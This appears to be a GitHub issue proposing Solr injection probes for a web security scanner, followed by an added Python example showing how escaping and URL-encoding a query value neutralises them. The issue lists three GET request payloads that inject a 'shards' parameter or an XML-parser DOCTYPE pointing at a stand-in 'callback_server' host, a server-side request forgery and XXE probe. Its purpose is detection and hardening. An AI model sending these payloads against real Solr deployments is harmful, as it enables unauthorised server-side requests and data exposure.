
Solr Injection

Open infosec-au opened this issue 6 years ago • 0 comments

https://github.com/artsploit/solr-injection#black-box-detection

GET /xxx?q=aaa%26shards=http://callback_server/solr 
GET /xxx?q=aaa&shards=http://callback_server/solr
GET /xxx?q={!type=xmlparser v="<!DOCTYPE a SYSTEM 'http://callback_server/solr'><a></a>"}

Solr is used a lot in underlying search/filtering technology, so I think these payloads should be tried in most forms; this could lead to easy bugs.

infosec-au, Aug 13 '19 08:08
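
The probes in this issue reach Solr when an application copies a decoded user value into the URL it sends to the search backend. As an added example (not code from ActiveScan++ or the linked repository), the following contrasts that concatenation with a builder that escapes and URL-encodes the value; `SOLR_SELECT` and all function names are hypothetical, and the escape set is modelled on SolrJ's `ClientUtils.escapeQueryChars`.

```python
import re
from urllib.parse import urlencode, urlsplit, parse_qs

# Hypothetical internal Solr endpoint, used only to build example URLs.
SOLR_SELECT = "http://solr.internal:8983/solr/items/select"

# Characters that carry meaning for Solr query parsers (assumed set,
# modelled on SolrJ's escapeQueryChars), plus whitespace.
_SPECIAL = re.compile(r'([\\+\-!():^\[\]"{}~*?|&;/\s])')


def escape_term(term: str) -> str:
    """Backslash-escape parser metacharacters so the term is literal text."""
    return _SPECIAL.sub(r"\\\1", term)


def naive_url(term: str) -> str:
    """Weak form: the decoded value is concatenated, so '&' starts a new
    Solr parameter and a leading '{!' selects a different query parser."""
    return f"{SOLR_SELECT}?q={term}&wt=json"


def safe_url(term: str) -> str:
    """Hardened form: escape the term, then let urlencode() encode it so it
    can only ever be the value of 'q'."""
    return SOLR_SELECT + "?" + urlencode({"q": escape_term(term), "wt": "json"})


def solr_params(url: str) -> dict:
    """Parse the query string the way the receiving server would."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


def has_local_params(url: str) -> bool:
    """True when the q value Solr receives begins with the '{!' prefix."""
    return solr_params(url)["q"][0].startswith("{!")


if __name__ == "__main__":
    # Constructed inputs: the decoded forms of the probes quoted in the issue.
    probes = [
        "aaa&shards=http://callback_server/solr",
        "{!type=xmlparser v=\"<!DOCTYPE a SYSTEM "
        "'http://callback_server/solr'><a></a>\"}",
    ]
    for p in probes:
        for build in (naive_url, safe_url):
            url = build(p)
            print(build.__name__, sorted(solr_params(url)), has_local_params(url))
```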